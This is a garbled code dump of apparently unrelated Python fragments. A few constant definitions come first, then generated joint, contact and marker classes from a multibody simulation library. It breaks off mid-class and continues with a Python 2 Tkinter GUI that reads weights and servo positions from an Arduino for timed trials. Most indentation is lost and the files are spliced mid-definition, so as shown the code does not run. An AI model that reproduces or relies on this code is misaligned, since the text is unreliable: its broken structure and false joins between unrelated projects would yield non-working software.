STRAIGHT_HDSSD = _straights(H, D, S, S, D)
STRAIGHT_HDSCS = _straights(H, D, S, C, S)
STRAIGHT_HDSCC = _straights(H, D, S, C, C)
        yield 'Vcolor', dict(self.visualization)["color"]
class VObjectContactCircleCable2D:
def __init__(self, show = True, drawSize = -1., color = [-1.,-1.,-1.,-1.]):
self.show = show
self.drawSize = drawSize
self.color = color
def __iter__(self):
yield 'show', self.show
yield 'drawSize', self.drawSize
yield 'color', self.color
class ObjectContactCircleCable2D:
def __init__(self, name = '', markerNumbers = [ -1, -1 ], nodeNumber = -1, numberOfContactSegments = 3, contactStiffness = 0., contactDamping = 0., circleRadius = 0., offset = 0., activeConnector = True, visualization = {'show': True, 'drawSize': -1., 'color': [-1.,-1.,-1.,-1.]}):
self.name = name
self.markerNumbers = markerNumbers
self.nodeNumber = nodeNumber
self.numberOfContactSegments = numberOfContactSegments
self.contactStiffness = contactStiffness
self.contactDamping = contactDamping
self.circleRadius = circleRadius
self.offset = offset
self.activeConnector = activeConnector
self.visualization = visualization
def __iter__(self):
yield 'objectType', 'ContactCircleCable2D'
yield 'name', self.name
yield 'markerNumbers', self.markerNumbers
yield 'nodeNumber', self.nodeNumber
yield 'numberOfContactSegments', self.numberOfContactSegments
yield 'contactStiffness', self.contactStiffness
yield 'contactDamping', self.contactDamping
yield 'circleRadius', self.circleRadius
yield 'offset', self.offset
yield 'activeConnector', self.activeConnector
yield 'Vshow', dict(self.visualization)["show"]
yield 'VdrawSize', dict(self.visualization)["drawSize"]
yield 'Vcolor', dict(self.visualization)["color"]
class VObjectContactFrictionCircleCable2D:
def __init__(self, show = True, drawSize = -1., color = [-1.,-1.,-1.,-1.]):
self.show = show
self.drawSize = drawSize
self.color = color
def __iter__(self):
yield 'show', self.show
yield 'drawSize', self.drawSize
yield 'color', self.color
class ObjectContactFrictionCircleCable2D:
def __init__(self, name = '', markerNumbers = [ -1, -1 ], nodeNumber = -1, numberOfContactSegments = 3, contactStiffness = 0., contactDamping = 0., frictionVelocityPenalty = 0., frictionStiffness = 0., frictionCoefficient = 0., circleRadius = 0., offset = 0., activeConnector = True, visualization = {'show': True, 'drawSize': -1., 'color': [-1.,-1.,-1.,-1.]}):
self.name = name
self.markerNumbers = markerNumbers
self.nodeNumber = nodeNumber
self.numberOfContactSegments = numberOfContactSegments
self.contactStiffness = contactStiffness
self.contactDamping = contactDamping
self.frictionVelocityPenalty = frictionVelocityPenalty
self.frictionStiffness = frictionStiffness
self.frictionCoefficient = frictionCoefficient
self.circleRadius = circleRadius
self.offset = offset
self.activeConnector = activeConnector
self.visualization = visualization
def __iter__(self):
yield 'objectType', 'ContactFrictionCircleCable2D'
yield 'name', self.name
yield 'markerNumbers', self.markerNumbers
yield 'nodeNumber', self.nodeNumber
yield 'numberOfContactSegments', self.numberOfContactSegments
yield 'contactStiffness', self.contactStiffness
yield 'contactDamping', self.contactDamping
yield 'frictionVelocityPenalty', self.frictionVelocityPenalty
yield 'frictionStiffness', self.frictionStiffness
yield 'frictionCoefficient', self.frictionCoefficient
yield 'circleRadius', self.circleRadius
yield 'offset', self.offset
yield 'activeConnector', self.activeConnector
yield 'Vshow', dict(self.visualization)["show"]
yield 'VdrawSize', dict(self.visualization)["drawSize"]
yield 'Vcolor', dict(self.visualization)["color"]
class VObjectJointGeneric:
def __init__(self, show = True, axesRadius = 0.1, axesLength = 0.4, color = [-1.,-1.,-1.,-1.]):
self.show = show
self.axesRadius = axesRadius
self.axesLength = axesLength
self.color = color
def __iter__(self):
yield 'show', self.show
yield 'axesRadius', self.axesRadius
yield 'axesLength', self.axesLength
yield 'color', self.color
class ObjectJointGeneric:
def __init__(self, name = '', markerNumbers = [ -1, -1 ], constrainedAxes = [1,1,1,1,1,1], rotationMarker0 = IIDiagMatrix(rowsColumns=3,value=1), rotationMarker1 = IIDiagMatrix(rowsColumns=3,value=1), activeConnector = True, offsetUserFunctionParameters = [0.,0.,0.,0.,0.,0.], offsetUserFunction = 0, offsetUserFunction_t = 0, visualization = {'show': True, 'axesRadius': 0.1, 'axesLength': 0.4, 'color': [-1.,-1.,-1.,-1.]}):
self.name = name
self.markerNumbers = markerNumbers
self.constrainedAxes = constrainedAxes
self.rotationMarker0 = rotationMarker0
self.rotationMarker1 = rotationMarker1
self.activeConnector = activeConnector
self.offsetUserFunctionParameters = offsetUserFunctionParameters
self.offsetUserFunction = offsetUserFunction
self.offsetUserFunction_t = offsetUserFunction_t
self.visualization = visualization
def __iter__(self):
yield 'objectType', 'JointGeneric'
yield 'name', self.name
yield 'markerNumbers', self.markerNumbers
yield 'constrainedAxes', self.constrainedAxes
yield 'rotationMarker0', self.rotationMarker0
yield 'rotationMarker1', self.rotationMarker1
yield 'activeConnector', self.activeConnector
yield 'offsetUserFunctionParameters', self.offsetUserFunctionParameters
yield 'offsetUserFunction', self.offsetUserFunction
yield 'offsetUserFunction_t', self.offsetUserFunction_t
yield 'Vshow', dict(self.visualization)["show"]
yield 'VaxesRadius', dict(self.visualization)["axesRadius"]
yield 'VaxesLength', dict(self.visualization)["axesLength"]
yield 'Vcolor', dict(self.visualization)["color"]
#add typedef for short usage:
GenericJoint = ObjectJointGeneric
VGenericJoint = VObjectJointGeneric
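#Illustrative sketch (not part of the generated item definitions): each item class
#above implements __iter__ as (key, value) pairs, so dict() turns an item into its
#plain parameter dictionary; the marker numbers here are placeholders.
#  joint = GenericJoint(name='joint0', markerNumbers=[0, 1], constrainedAxes=[1,1,1,0,0,0])
#  dict(joint)['objectType']    #returns 'JointGeneric'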
class VObjectJointSpherical:
def __init__(self, show = True, jointRadius = 0.1, color = [-1.,-1.,-1.,-1.]):
self.show = show
self.jointRadius = jointRadius
self.color = color
def __iter__(self):
yield 'show', self.show
yield 'jointRadius', self.jointRadius
yield 'color', self.color
class ObjectJointSpherical:
def __init__(self, name = '', markerNumbers = [ -1, -1 ], constrainedAxes = [1,1,1], activeConnector = True, visualization = {'show': True, 'jointRadius': 0.1, 'color': [-1.,-1.,-1.,-1.]}):
self.name = name
self.markerNumbers = markerNumbers
self.constrainedAxes = constrainedAxes
self.activeConnector = activeConnector
self.visualization = visualization
def __iter__(self):
yield 'objectType', 'JointSpherical'
yield 'name', self.name
yield 'markerNumbers', self.markerNumbers
yield 'constrainedAxes', self.constrainedAxes
yield 'activeConnector', self.activeConnector
yield 'Vshow', dict(self.visualization)["show"]
yield 'VjointRadius', dict(self.visualization)["jointRadius"]
yield 'Vcolor', dict(self.visualization)["color"]
#add typedef for short usage:
SphericalJoint = ObjectJointSpherical
VSphericalJoint = VObjectJointSpherical
class VObjectJointRollingDisc:
def __init__(self, show = True, discWidth = 0.1, color = [-1.,-1.,-1.,-1.]):
self.show = show
self.discWidth = discWidth
self.color = color
def __iter__(self):
yield 'show', self.show
yield 'discWidth', self.discWidth
yield 'color', self.color
class ObjectJointRollingDisc:
def __init__(self, name = '', markerNumbers = [ -1, -1 ], constrainedAxes = [1,1,1], activeConnector = True, discRadius = 0, visualization = {'show': True, 'discWidth': 0.1, 'color': [-1.,-1.,-1.,-1.]}):
self.name = name
self.markerNumbers = markerNumbers
self.constrainedAxes = constrainedAxes
self.activeConnector = activeConnector
self.discRadius = discRadius
self.visualization = visualization
def __iter__(self):
yield 'objectType', 'JointRollingDisc'
yield 'name', self.name
yield 'markerNumbers', self.markerNumbers
yield 'constrainedAxes', self.constrainedAxes
yield 'activeConnector', self.activeConnector
yield 'discRadius', self.discRadius
yield 'Vshow', dict(self.visualization)["show"]
yield 'VdiscWidth', dict(self.visualization)["discWidth"]
yield 'Vcolor', dict(self.visualization)["color"]
#add typedef for short usage:
RollingDiscJoint = ObjectJointRollingDisc
VRollingDiscJoint = VObjectJointRollingDisc
class VObjectJointRevolute2D:
def __init__(self, show = True, drawSize = -1., color = [-1.,-1.,-1.,-1.]):
self.show = show
self.drawSize = drawSize
self.color = color
def __iter__(self):
yield 'show', self.show
yield 'drawSize', self.drawSize
yield 'color', self.color
class ObjectJointRevolute2D:
def __init__(self, name = '', markerNumbers = [ -1, -1 ], activeConnector = True, visualization = {'show': True, 'drawSize': -1., 'color': [-1.,-1.,-1.,-1.]}):
self.name = name
self.markerNumbers = markerNumbers
self.activeConnector = activeConnector
self.visualization = visualization
def __iter__(self):
yield 'objectType', 'JointRevolute2D'
yield 'name', self.name
yield 'markerNumbers', self.markerNumbers
yield 'activeConnector', self.activeConnector
yield 'Vshow', dict(self.visualization)["show"]
yield 'VdrawSize', dict(self.visualization)["drawSize"]
yield 'Vcolor', dict(self.visualization)["color"]
#add typedef for short usage:
RevoluteJoint2D = ObjectJointRevolute2D
VRevoluteJoint2D = VObjectJointRevolute2D
class VObjectJointPrismatic2D:
def __init__(self, show = True, drawSize = -1., color = [-1.,-1.,-1.,-1.]):
self.show = show
self.drawSize = drawSize
self.color = color
def __iter__(self):
yield 'show', self.show
yield 'drawSize', self.drawSize
yield 'color', self.color
class ObjectJointPrismatic2D:
def __init__(self, name = '', markerNumbers = [ -1, -1 ], axisMarker0 = [1.,0.,0.], normalMarker1 = [0.,1.,0.], constrainRotation = True, activeConnector = True, visualization = {'show': True, 'drawSize': -1., 'color': [-1.,-1.,-1.,-1.]}):
self.name = name
self.markerNumbers = markerNumbers
self.axisMarker0 = axisMarker0
self.normalMarker1 = normalMarker1
self.constrainRotation = constrainRotation
self.activeConnector = activeConnector
self.visualization = visualization
def __iter__(self):
yield 'objectType', 'JointPrismatic2D'
yield 'name', self.name
yield 'markerNumbers', self.markerNumbers
yield 'axisMarker0', self.axisMarker0
yield 'normalMarker1', self.normalMarker1
yield 'constrainRotation', self.constrainRotation
yield 'activeConnector', self.activeConnector
yield 'Vshow', dict(self.visualization)["show"]
yield 'VdrawSize', dict(self.visualization)["drawSize"]
yield 'Vcolor', dict(self.visualization)["color"]
#add typedef for short usage:
PrismaticJoint2D = ObjectJointPrismatic2D
VPrismaticJoint2D = VObjectJointPrismatic2D
class VObjectJointSliding2D:
def __init__(self, show = True, drawSize = -1., color = [-1.,-1.,-1.,-1.]):
self.show = show
self.drawSize = drawSize
self.color = color
def __iter__(self):
yield 'show', self.show
yield 'drawSize', self.drawSize
yield 'color', self.color
class ObjectJointSliding2D:
def __init__(self, name = '', markerNumbers = [ -1, -1 ], slidingMarkerNumbers = [], slidingMarkerOffsets = [], nodeNumber = -1, classicalFormulation = True, activeConnector = True, visualization = {'show': True, 'drawSize': -1., 'color': [-1.,-1.,-1.,-1.]}):
self.name = name
self.markerNumbers = markerNumbers
self.slidingMarkerNumbers = slidingMarkerNumbers
self.slidingMarkerOffsets = slidingMarkerOffsets
self.nodeNumber = nodeNumber
self.classicalFormulation = classicalFormulation
self.activeConnector = activeConnector
self.visualization = visualization
def __iter__(self):
yield 'objectType', 'JointSliding2D'
yield 'name', self.name
yield 'markerNumbers', self.markerNumbers
yield 'slidingMarkerNumbers', self.slidingMarkerNumbers
yield 'slidingMarkerOffsets', self.slidingMarkerOffsets
yield 'nodeNumber', self.nodeNumber
yield 'classicalFormulation', self.classicalFormulation
yield 'activeConnector', self.activeConnector
yield 'Vshow', dict(self.visualization)["show"]
yield 'VdrawSize', dict(self.visualization)["drawSize"]
yield 'Vcolor', dict(self.visualization)["color"]
#add typedef for short usage:
SlidingJoint2D = ObjectJointSliding2D
VSlidingJoint2D = VObjectJointSliding2D
class VObjectJointALEMoving2D:
def __init__(self, show = True, drawSize = -1., color = [-1.,-1.,-1.,-1.]):
self.show = show
self.drawSize = drawSize
self.color = color
def __iter__(self):
yield 'show', self.show
yield 'drawSize', self.drawSize
yield 'color', self.color
class ObjectJointALEMoving2D:
def __init__(self, name = '', markerNumbers = [ -1, -1 ], slidingMarkerNumbers = [], slidingMarkerOffsets = [], slidingOffset = 0., nodeNumbers = [ -1, -1 ], usePenaltyFormulation = False, penaltyStiffness = 0., activeConnector = True, visualization = {'show': True, 'drawSize': -1., 'color': [-1.,-1.,-1.,-1.]}):
self.name = name
self.markerNumbers = markerNumbers
self.slidingMarkerNumbers = slidingMarkerNumbers
self.slidingMarkerOffsets = slidingMarkerOffsets
self.slidingOffset = slidingOffset
self.nodeNumbers = nodeNumbers
self.usePenaltyFormulation = usePenaltyFormulation
self.penaltyStiffness = penaltyStiffness
self.activeConnector = activeConnector
self.visualization = visualization
def __iter__(self):
yield 'objectType', 'JointALEMoving2D'
yield 'name', self.name
yield 'markerNumbers', self.markerNumbers
yield 'slidingMarkerNumbers', self.slidingMarkerNumbers
yield 'slidingMarkerOffsets', self.slidingMarkerOffsets
yield 'slidingOffset', self.slidingOffset
yield 'nodeNumbers', self.nodeNumbers
yield 'usePenaltyFormulation', self.usePenaltyFormulation
yield 'penaltyStiffness', self.penaltyStiffness
yield 'activeConnector', self.activeConnector
yield 'Vshow', dict(self.visualization)["show"]
yield 'VdrawSize', dict(self.visualization)["drawSize"]
yield 'Vcolor', dict(self.visualization)["color"]
#add typedef for short usage:
ALEMovingJoint2D = ObjectJointALEMoving2D
VALEMovingJoint2D = VObjectJointALEMoving2D
#+++++++++++++++++++++++++++++++
#MARKER
class VMarkerBodyMass:
def __init__(self, show = True):
self.show = show
def __iter__(self):
yield 'show', self.show
class MarkerBodyMass:
def __init__(self, name = '', bodyNumber = -1, visualization = {'show': True}):
self.name = name
self.bodyNumber = bodyNumber
self.visualization = visualization
def __iter__(self):
yield 'markerType', 'BodyMass'
yield 'name', self.name
yield 'bodyNumber', self.bodyNumber
yield 'Vshow', dict(self.visualization)["show"]
class VMarkerBodyPosition:
def __init__(self, show = True):
self.show = show
def __iter__(self):
        yield 'show', self.show
#! /usr/bin/env python2
# v0.11
#///////////////////////////////////////////////////////////////////////////////
#/ MIT License //
#/ //
#/ Copyright (c) [2015] [<NAME>] //
#/ //
#/ Permission is hereby granted, free of charge, to any person obtaining a //
#/ copy of this software and associated documentation files (the "Software"), //
#/ to deal in the Software without restriction, including without limitation //
#/ the rights to use, copy, modify, merge, publish, distribute, sublicense, //
#/ and/or sell copies of the Software, and to permit persons to whom the //
#/ Software is furnished to do so, subject to the following conditions: //
#/ //
#/ The above copyright notice and this permission notice shall be included //
#/ in all copies or substantial portions of the Software. //
#/ //
#/ THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR //
#/ IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, //
#/ FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL //
#/ THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER //
#/ LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING //
#/ FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER //
#/ DEALINGS IN THE SOFTWARE. //
#///////////////////////////////////////////////////////////////////////////////
import serial
import time
from Tkinter import *
import Tkinter, Tkconstants, tkFileDialog
import ConfigParser
import tkMessageBox
import Tkinter as tk
from serial import SerialException
import sys
from time import sleep
global reset_var
reset_var = 0;
global running_var
running_var = 0
global curr_NoT
curr_NoT = 0
global lat_OFF_list
lat_OFF_list = []
global lat_ON_list
lat_ON_list = []
global trial_list
trial_list = []
global sides_list
sides_list = []
global dist_OFF_list
dist_OFF_list = []
global dist_ON_list
dist_ON_list = []
global tof_list
tof_list = []
global its_list
its_list = []
global start_t
start_t = 0.0
global stop_OFF_t
stop_OFF_t = 0.0
global stop_ON_t
stop_ON_t = 0.0
global last_t
last_t = 0.0
global lat_OFF
lat_OFF = 0.0
global lat_ON
lat_ON = 0.0
global we_are_moving
we_are_moving = 0
global we_are_flying
we_are_flying = 0
global we_are_balancing
we_are_balancing = 0
global curr_arm
curr_arm = None
global opp_arm
opp_arm = None
global servo1_pos
servo1_pos = 0
global servo2_pos
servo2_pos = 0
global takeoff_t
takeoff_t = None
global landing_t
landing_t = None
global its
its = 0
global before
before = None
global now
now = None
global ser
def portIsUsable(portName):
global ser
try:
ser = serial.Serial(port=portName)
return True
except:
tk.Tk().withdraw() #avoids the second window popping up!
tkMessageBox.showerror("Open Port","Cannot open port\n\n(%s)" % portName)
sys.exit(0)
return False
if portIsUsable('/dev/ttyACM0'):
ser = serial.Serial('/dev/ttyACM0', 115200,timeout=None)
ser.flushInput()
#print("Reset Arduino")
time.sleep(2)
class App (Tkinter.Frame):
def __init__(self, master):
Frame.__init__(self)
global running_var
global return_val
global servoA_dir
servoA_dir= 1
global servoB_dir
servoB_dir = 1
return_val = None
self._start = 0.0
self._elapsedtime = 0.0
self._running = 0
frame = Frame(master)
frame.grid(row=0)
global acclimation_period
acclimation_period = StringVar(master)
acclimation_period.set("2.0")
global iti
iti = StringVar(master)
iti.set("1.0")
global weight
weight = StringVar(master)
weight.set("15")
global speed
speed = StringVar(master)
speed.set("2.3")
global NoT
NoT = StringVar(master)
NoT.set("10")
global acclimation_min
acclimation_min = 0.1
global acclimation_max
acclimation_max = 10
global iti_min
iti_min = 0.1
global iti_max
iti_max = 10
global weight_min
weight_min = 1
global weight_max
weight_max = 50
global speed_min
speed_min = 0.1
global speed_max
speed_max = 5
global NoT_min
NoT_min = 1
global NoT_max
NoT_max = 50
global weight_var_A
weight_var_A=0
global weight_var_B
weight_var_B=0
global vals_to_PC
vals_to_PC = ['0', '0', '0', '0', '0']
global old_vals_to_PC
old_vals_to_PC = ['0', '0', '0', '0', '0']
vcmd_acclimation = master.register(self._OnValidate_acclimation),'%d', '%i', '%P', '%s', '%S', '%v', '%V', '%W'
vcmd_iti = master.register(self._OnValidate_iti),'%d', '%i', '%P', '%s', '%S', '%v', '%V', '%W'
vcmd_weight = master.register(self._OnValidate_weight),'%d', '%i', '%P', '%s', '%S', '%v', '%V', '%W'
vcmd_speed = master.register(self._OnValidate_speed),'%d', '%i', '%P', '%s', '%S', '%v', '%V', '%W'
vcmd_NoT = master.register(self._OnValidate_NoT),'%d', '%i', '%P', '%s', '%S', '%v', '%V', '%W'
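        # Tk validatecommand percent substitutions registered above (standard Tkinter
        # behaviour, noted here for clarity): '%P' is the value the entry would hold
        # after the edit and '%S' is the text being inserted or deleted; the other
        # codes are passed to the _OnValidate_* callbacks but not used there.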
#ACCLIMATION
self.acclimation = Label(frame, text="Acclimation Period", justify=LEFT,height=2, width=20).grid(row=0,column=0,sticky=W,rowspan=2,padx=(2,0))
self.acclimation_sb = Spinbox(frame, from_=acclimation_min, to=acclimation_max, increment=0.5, textvariable=acclimation_period,font="Verdana 11", validate="key",
validatecommand=vcmd_acclimation, width = 10).grid(row=0,column=1,sticky=EW,rowspan=2, columnspan = 1)
self.acc_ord = Label(frame, text="min", justify=RIGHT,height=2, font="fixedsys 10 bold").grid(row=0,column=2,sticky=W,rowspan=2,padx=(0,2))
#ITI
self.iti = Label(frame, text="Intertrial Interval", justify=LEFT,height=2, width=20).grid(row=2,column=0,sticky=W,rowspan=2,padx=(2,0))
self.iti_sb = Spinbox(frame, from_=iti_min, to=iti_max, increment=0.5, textvariable=iti,font="Verdana 11", validate="key",
validatecommand=vcmd_iti, width = 10).grid(row=2,column=1,sticky=EW,rowspan=2, columnspan = 1)
self.iti_ord = Label(frame, text="min", justify=RIGHT,height=2, font="fixedsys 10 bold").grid(row=2,column=2,sticky=W,rowspan=2,padx=(0,2))
#WEIGHT
self.weight = Label(frame, text="Weight Threshold", justify=LEFT,height=2, width=20).grid(row=4,column=0,sticky=W,rowspan=2,padx=(2,0))
self.weight_sb = Spinbox(frame, from_=weight_min, to=weight_max, increment=1, textvariable=weight,font="Verdana 11", validate="key",
validatecommand=vcmd_weight, width = 10).grid(row=4,column=1,sticky=EW,rowspan=2, columnspan = 1)
self.weight_ord = Label(frame, text="grams", justify=RIGHT,height=2, font="fixedsys 10 bold").grid(row=4,column=2,sticky=W,rowspan=2,padx=(0,2))
#SPEED
self.speed = Label(frame, text="Speed", justify=LEFT,height=2, width=20).grid(row=6,column=0,sticky=W,rowspan=2,padx=(2,0))
self.speed_sb = Spinbox(frame, from_=speed_min, to=speed_max, increment=0.1, textvariable=speed,font="Verdana 11", validate="key",
validatecommand=vcmd_speed, width = 10).grid(row=6,column=1,sticky=EW,rowspan=2, columnspan = 1)
self.speed_ord = Label(frame, text="mm/s", justify=RIGHT,height=2, font="fixedsys 10 bold").grid(row=6,column=2,sticky=W,rowspan=2,padx=(0,2))
#NoT
self.NoT = Label(frame, text="Number of Trials", justify=LEFT,height=2, width=20).grid(row=8,column=0,sticky=W,rowspan=2,padx=(2,0))
self.NoT_sb = Spinbox(frame, from_=NoT_min, to=NoT_max, increment=1, textvariable=NoT,font="Verdana 11", validate="key",
validatecommand=vcmd_NoT, width = 10).grid(row=8,column=1,sticky=EW,rowspan=2, columnspan = 1)
self.NoT_ord = Label(frame, text=" ", justify=RIGHT,height=2, font="fixedsys 10 bold").grid(row=8,column=2,sticky=W,rowspan=2,padx=(0,2))
#TIME
global timestr
timestr = StringVar()
global time_label
time_label = Label(frame, textvariable=timestr,relief=SUNKEN,borderwidth=3, font="device 10", bg="white", padx=8, pady=1)
time_label.grid(row=10,column=0,rowspan=2)
#CLOCK Control
self.startbutton = Tkinter.Button(frame,text=u"Start", command=self.Start, font="fixedsys 10 bold",borderwidth=2, width = 2).grid(row=10,column=1,sticky=W,rowspan=2)
self.stopbutton = Tkinter.Button(frame,text=u"Stop", command=self.Stop, font="fixedsys 10 bold",borderwidth=2, width = 2).grid(row=10,column=1,rowspan=2)
self.resetbutton = Tkinter.Button(frame,text=u"Reset", command=self.Reset, font="fixedsys 10 bold",borderwidth=2, width = 2).grid(row=10,column=1,sticky=E,rowspan=2)
#self.quitbutton = Tkinter.Button(frame,text=u"Quit", command=self.quit, font="fixedsys 10 bold",borderwidth=2).grid(row=10,column=2,sticky=E,rowspan=2)
#SEPARATORS
#those get poorly updated when the window is e.g. covered with the terminal .... maybe get removed in v0.2
separator1=Frame(frame,height=10,bg="").grid(row=12, columnspan=4,sticky=NSEW,rowspan=1)
separator2=Frame(frame,height=1,bg="").grid(row=14, columnspan=4,sticky=NSEW,rowspan=1)
separator3=Frame(frame,height=10,bg="").grid(row=16, columnspan=4,sticky=NSEW,rowspan=1)
separator4=Frame(frame,height=10,bg="").grid(row=21, columnspan=4,sticky=NSEW,rowspan=1)
separator5=Frame(frame,height=10,bg="").grid(row=23, columnspan=4,sticky=NSEW,rowspan=1)
#LED Control
#No function till now!
#led_a = Checkbutton(frame,text=" LED A",font="fixedsys 8")
#led_a.grid(row=13,column=0,sticky=W,padx=5)
#led_b = Checkbutton(frame,text=" LED B",font="fixedsys 8")
#led_b.grid(row=15,column=0,sticky=W,padx=5)
global weight_A
weight_A_l = Label(frame,text="Weight A", height=1).grid(row=13,column=0,sticky=E)
weight_A = Label(frame,text=weight_var_A, height=1, relief=SUNKEN, anchor=N)
weight_A.grid(row=13,column=1,sticky=NSEW)
weight_A_ord = Label(frame, text="grams", justify=RIGHT, font="fixedsys 10 bold").grid(row=13,column=2,sticky=W,padx=(0,2))
global weight_B
        weight_B_l = Label(frame,text="Weight B", height=1).grid(row=15,column=0,sticky=E)
weight_B = Label(frame,text=weight_var_B, height=1, relief=SUNKEN, anchor=N)
weight_B.grid(row=15,column=1,sticky=NSEW)
weight_B_ord = Label(frame, text="grams", justify=RIGHT, font="fixedsys 10 bold").grid(row=15,column=2,sticky=W,padx=(0,2))
#SLIDERS
global slide_A,slide_A_label2
slide_A_label = Label(frame,text="Pos A").grid(row=18,column=0,sticky=E,rowspan=2,pady=(0,3))
slide_A = Scale(frame, from_=140, to=0,orient=HORIZONTAL,showvalue=0,sliderlength=20,length=150,troughcolor="white")
slide_A.grid(row=18,column=1,columnspan=1,sticky=W,rowspan=2)
slide_A_label2 = Label(frame,text=servo1_pos, width=5)
slide_A_label2.grid(row=18,column=2,sticky=W,rowspan=2,pady=(0,8),padx=(0,10))
#RST A
global slide_A_rst
slide_A_rst = Button(frame,text="A Reset",font="fixedsys 10 bold",command=lambda: self.hard_reset("A"),bg="gray" )
slide_A_rst.grid(row=18,column=0,sticky=W,ipadx=5,padx=5)
global slide_B,slide_B_label2
slide_B_label = Label(frame,text="Pos B").grid(row=20,column=0,sticky=E,rowspan=2,pady=(0,13))
slide_B = Scale(frame, from_=140, to=0,orient=HORIZONTAL,showvalue=0,sliderlength=20,length=150,troughcolor="white")
slide_B.grid(row=20,column=1,columnspan=1,sticky=W,rowspan=2)
slide_B_label2 = Label(frame,text=servo2_pos, width=5)
slide_B_label2.grid(row=20,column=2,sticky=W,rowspan=2,pady=(0,16),padx=(0,10))
#RST B
global slide_B_rst
slide_B_rst = Button(frame,text="B Reset",font="fixedsys 10 bold", command=lambda: self.hard_reset("B"),bg="gray" )
slide_B_rst.grid(row=20,column=0,sticky=W,ipadx=5,padx=5)
#STATUS BAR
global status_field
status_field = Label(frame,text="... waiting ", fg="black",height=2, relief=SUNKEN, justify=LEFT)
status_field.grid(row=22,column=0,columnspan=4,sticky=NSEW,padx=(2,2))
#TEXT Fields
global lines
lines=NoT.get()
global trial_window
trial_window=Text(frame,height=lines,width=12,font="fixedsys 8",spacing2=1,spacing3=2)
trial_window.grid(row=24,column=0,sticky=W)
global sides_window
sides_window=Text(frame,height=lines,width=12,font="fixedsys 8",spacing2=1,spacing3=2)
sides_window.grid(row=24,column=0,sticky=E)
global lat_OFF_window
lat_OFF_window=Text(frame,height=lines,width=12,font="fixedsys 8",spacing2=1,spacing3=2)
lat_OFF_window.grid(row=24,column=1,sticky=W)
#global dist_OFF_window
#dist_OFF_window=Text(frame,height=lines,width=12,font="fixedsys 8",spacing2=1,spacing3=2)
#dist_OFF_window.grid(row=24,column=1,sticky=W)
#global dist_ON_window
#dist_ON_window=Text(frame,height=lines,width=12,font="fixedsys 8",spacing2=1,spacing3=2)
#dist_ON_window.grid(row=24,column=1)
#global tof_window
#tof_window=Text(frame,height=lines,width=12,font="fixedsys 8",spacing2=1,spacing3=2)
#tof_window.grid(row=24,column=1,sticky=E)
global lat_ON_window
lat_ON_window=Text(frame,height=lines,width=12,font="fixedsys 8",spacing2=1,spacing3=2)
lat_ON_window.grid(row=24,column=1,sticky=E)
global its_window
its_window=Text(frame,height=lines,width=8,font="fixedsys 8",spacing2=1,spacing3=2)
its_window.grid(row=24,column=2,sticky=W)
trial_window.insert(END,"TRIAL:"+"\n")
sides_window.insert(END, "ARM:"+"\n")
lat_OFF_window.insert(END,"LAT_OFF:"+"\n")
#dist_OFF_window.insert(END,"DIST_OFF:"+"\n")
lat_ON_window.insert(END,"LAT_ON:"+"\n")
#dist_ON_window.insert(END,"DIST_ON:"+"\n")
#tof_window.insert(END,"ToF:"+"\n")
its_window.insert(END,"ITS:"+"\n")
self.makeWidgets()
def hard_reset(self,arm):
""" Kinda the Emergency Reset, e.g. also stops the clock """
global reset_var
if (arm == "A"):
reset_var=1
if (arm == "B"):
reset_var=2
def round_to(self,n, precision):
correction = 0.5 if n >= 0 else -0.5
return int( n/precision+correction ) * precision
def round_to_5(self,n):
return self.round_to(n, 0.5)
def _update_values(self):
""" This function updates and parses the values read from the arduino """
global old_vals_to_PC
global vals_to_PC
global weight_var_A
global weight_var_B
global servo1_pos
global servo2_pos
global distanceA
global distanceB
line = self._readline()
vals_to_PC=line.split(',')
if (self.validate_vals(4)==True):
old_vals_to_PC=vals_to_PC
if (self.validate_vals(4)==False):
print vals_to_PC
vals_to_PC=old_vals_to_PC
weight_var_A = int(round( (0.5*float(vals_to_PC[0])+0.5*float(old_vals_to_PC[0])),0))
weight_var_B = int(round( (0.5*float(vals_to_PC[1])+0.5*float(old_vals_to_PC[1])),0))
servo1_pos = float(round( (0.5*float(vals_to_PC[2])+0.5*float(old_vals_to_PC[2])),0))
servo2_pos = float(round( (0.5*float(vals_to_PC[3])+0.5*float(old_vals_to_PC[3])),0))
weight_var_A = self.round_to_5(round((0.0749129009*float(weight_var_A)-0.9088320258),2))
weight_var_B = self.round_to_5(round((0.0763157054*float(weight_var_B)-0.9683740794),2))
#update labels
weight_A.configure(text=weight_var_A)
weight_B.configure(text=weight_var_B)
if weight_var_A>=float(weight.get()):
weight_A.configure(bg='lawn green')
else:
weight_A.configure(bg=defaultbg)
if weight_var_B>=float(weight.get()):
weight_B.configure(bg='lawn green')
else:
weight_B.configure(bg=defaultbg)
distanceA = int( round(((-5.92613311630418E-8)*(servo1_pos*servo1_pos*servo1_pos)+0.0002948917*(servo1_pos*servo1_pos)-0.3487265211*servo1_pos+115.5057514142),0))
distanceB = int( round(((7.19346722522172E-8)*(servo2_pos*servo2_pos*servo2_pos)-0.0003226514*(servo2_pos*servo2_pos)+0.3380168316*servo2_pos+49.1057851055),0))
if (distanceA <= 1):
distanceA = 0
if (distanceB <= 1):
distanceB = 0
slide_A.set(distanceA)
slide_A_label2.configure(text=distanceA)
slide_B.set(distanceB)
slide_B_label2.configure(text=distanceB)
if (distanceA<140):
slide_A_rst.config(bg="IndianRed1")
else:
slide_A_rst.config(bg="gray")
if (distanceB<140):
slide_B_rst.config(bg="IndianRed1")
else:
slide_B_rst.config(bg="gray")
    def validate_vals(self,length):
        """ As not all values from the arduino are valid we need to make sense out of the gibberish """
        global vals_to_PC, old_vals_to_PC
        try:
            for x in range(0,length):
                a=int(vals_to_PC[x])
            # only report success once every requested value converted cleanly
            return True
        except (ValueError, IndexError) as e:
            print e
            print vals_to_PC
            vals_to_PC=old_vals_to_PC
            return False
        except:
            print "Other Error!"
            print vals_to_PC
            vals_to_PC=old_vals_to_PC
            return False
def _OnValidate_acclimation(self, d, i, P, s, S, v, V, W):
"""This function checks if the input values into the spinboxes are valid"""
if S in '0123456789.':
try:
float(P)
return (float(P)>=acclimation_min) and (float(P)<=acclimation_max)
except ValueError:
return False
